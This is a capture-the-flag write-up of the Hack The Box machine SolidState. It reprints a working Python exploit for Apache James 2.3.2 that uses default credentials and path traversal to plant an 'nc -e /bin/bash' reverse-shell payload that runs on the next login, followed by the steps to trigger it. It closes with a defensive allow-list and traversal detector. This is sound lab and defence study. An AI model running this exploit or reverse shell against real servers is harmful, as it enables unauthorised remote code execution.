
HTB Box: SolidState

This article is intended solely for technical exchange, learning and research. Using the techniques in it for illegal purposes or for causing damage is strictly forbidden; the author of this article bears no responsibility for any consequences.

The box is a retired machine I worked on with a purchased VIP subscription; its IP address shows as 10.10.10.51.

This time I used https://github.com/Tib3rius/AutoRecon for an automated, all-round scan.

Command run:

autorecon 10.10.10.51 -o ./solidstate-autorecon

The scan found port 4555 open, with the service identified as james-admin (the Apache James Remote Administration Tool), which has a remote code execution vulnerability.

Corresponding exploit code: https://www.exploit-db.com/exploits/35513

#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
payload = 'nc -e /bin/bash 10.10.14.5 8833' # to exploit only on root

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
    s.recv(1024)
    time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

Exploitation method:

The only change the exploit needs is the payload, set to: 'nc -e /bin/bash 10.10.14.5 8833'. Then start a listener on port 8833 on the local Kali machine.

Step 1: python 35513.py 10.10.10.51

Step 2: ssh 10.10.10.51 -l mindy

Enter any password. Once that is done, just wait for nc to receive the reverse shell.

This box is identical to a VulnHub machine I did earlier; the manual walkthrough is at: https://www.cnblogs.com/autopwn/p/13809602.html

PS: The exploitation method for this box is the same as the one I used on VulnHub. At the time, on VulnHub, I thought the password had to be reset first and the vulnerability could only be used once the password was correct. On this HTB box I found that this is not necessary: any password typed in triggers the vulnerability. Everyone can test and verify this for themselves.
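The root cause of the 35513 technique is that James 2.3.2 accepts a user name containing "../" and later uses it as a directory under its mail repository, so the message body lands in /etc/bash_completion.d. The following is an added example (not from the original post, the exploit, or Apache James) from the defender's side: a strict allow-list check on the local part that would have rejected both the adduser name and the RCPT TO address, applied to constructed sample lines modelled on what the exploit sends.

```python
import re

# Allow-list for a mailbox local part: must start alphanumeric and may only
# contain letters, digits, ".", "_" and "-". A "/" or a leading "." can never
# pass, so the name cannot be interpreted as a path step.
LOCAL_PART_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

def is_safe_local_part(name):
    """Return True only for names that cannot escape the repository directory."""
    if not LOCAL_PART_RE.match(name):
        return False
    # Belt and braces: also refuse an embedded ".." even if a looser pattern
    # were substituted later.
    return ".." not in name

# Constructed sample lines (not real James log output), tagged with the port
# they would arrive on: the admin tool (4555) and SMTP (25).
SAMPLE_LINES = [
    "4555 adduser mindy mypass",
    "4555 adduser ../../../../../../../../etc/bash_completion.d exploit",
    "25 rcpt to: <mindy@solidstate>",
    "25 rcpt to: <../../../../../../../../etc/bash_completion.d>",
    "25 rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>",
]

ADDUSER_RE = re.compile(r"adduser\s+(\S+)")
RCPT_RE = re.compile(r"rcpt to:\s*<([^>@]+)", re.IGNORECASE)

def extract_name(line):
    """Pull the user name or recipient local part out of a line, or None."""
    m = ADDUSER_RE.search(line) or RCPT_RE.search(line)
    return m.group(1) if m else None

def find_traversal_attempts(lines):
    """Return the lines whose user or recipient name fails the allow-list."""
    hits = []
    for line in lines:
        name = extract_name(line)
        if name is not None and not is_safe_local_part(name):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LINES):
        print("ALERT: path traversal in James user/recipient name: " + hit)
```

The same check belongs at the point where James turns a name into a repository path; rejecting the name up front means there is nothing for a later login to execute.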